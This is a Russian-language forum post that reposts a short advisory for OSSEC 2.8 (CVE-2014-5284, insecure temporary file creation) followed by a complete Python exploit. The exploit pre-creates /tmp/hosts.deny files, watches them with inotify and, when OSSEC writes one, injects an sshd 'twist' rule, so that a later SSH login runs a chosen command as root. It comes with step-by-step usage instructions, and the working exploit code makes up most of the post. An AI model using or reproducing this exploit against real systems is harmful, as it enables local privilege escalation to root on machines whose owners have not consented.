Старый 15.11.2014, 22:56   #1
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию OSSEC CVE-2014-5284 Insecure Temporary File Creation Vulnerability

OSSEC CVE-2014-5284 Insecure Temporary File Creation Vulnerability

OSSEC is prone to an insecure temporary file-creation vulnerability.

An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Other attacks may also be possible.

OSSEC 2.8 is vulnerable; other versions may also be affected.

Код:
#!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC - 2.8
# Tested on: Ubunutu x86_64
# CVE : 2014-5284
# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

# Run this on target machine and follow instructions to execute command as root

from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import signal


class HostDenyExploiter(object):

def __init__(self, path_to_watch, cmd):
self.path = path_to_watch
self.notifier = inotify.INotify()
self.exploit = cmd

def create_files(self):
print "=============================================="
print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

for i in range(300, 65536):
filename = "/tmp/hosts.deny.%s" % i
f = open(filename, 'w')
f.write("")
f.close()

def watch_files(self):
print "=============================================="
print "Monitoring tmp for file change...."
print "ssh into the system a few times with an incorrect password"
print "Then wait for up to 10 mins"
print "=============================================="
self.notifier.startReading()
self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])

def write_exploit_to_file(self, path):
print 'Writing exploit to this file'
f = open(str(path).split("'")[1], 'w')
f.write(' sshd : ALL : twist %s \n' % self.exploit)
f.close()
print "=============================================="
print " ssh in again to execute the command"
print "=============================================="
print " End Prog."
os.kill(os.getpid(), signal.SIGUSR1)

def on_file_change(self, watch, path, mask):
print 'File: ', str(path).split("'")[1], ' has just been modified'
self.notifier.stopReading()
self.write_exploit_to_file(path)


if __name__ == '__main__':
parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
(options, args) = parser.parse_args()
cmd = options.cmd
if options.cmd is None:
print parser.usage
exit(0)
ex = HostDenyExploiter('/tmp', cmd)
ex.create_files()
ex.watch_files()
reactor.run()
exit(0)
http://cxsecurity.com/issue/WLB-2014110104

http://www.securityfocus.com/bid/70149/discuss
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot